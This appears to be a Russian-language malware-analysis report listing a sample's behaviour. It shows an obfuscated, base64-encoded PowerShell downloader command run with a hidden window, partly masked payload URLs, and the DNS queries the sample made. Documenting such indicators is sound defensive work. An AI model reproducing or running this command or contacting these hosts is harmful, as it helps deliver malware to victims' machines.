Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYQBpAGwAYgBxAD0AKAAoACcAQgAnACsAJwBoADYAJwApACsAKAAnAGQAeQAnACsAJwA5ACcAKQArACcAYQAnACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHQARQBNAFAAXAB3AG8AUgBkAF...
- http://al###zsons.com/og4zex/tbM/
- http://le#####nesboldogan.com/wordpress/3/
- http://me####4newss.com/cgi-bin/d/
- http://ma#####ta.lequss.com/ih2/oO/
- DNS ASK al###zsons.com
- DNS ASK le#####nesboldogan.com
- DNS ASK me####4newss.com
- DNS ASK 7a####lfallah.com
- DNS ASK gn##ur.com
- DNS ASK ma#####ta.lequss.com
- DNS ASK ad#####eboutique.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYQBpAGwAYgBxAD0AKAAoACcAQgAnACsAJwBoADYAJwApACsAKAAnAGQAeQAnACsAJwA5ACcAKQArACcAYQAnACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHQARQBNAFAAXAB3AG8AUgBkAF...' (со скрытым окном)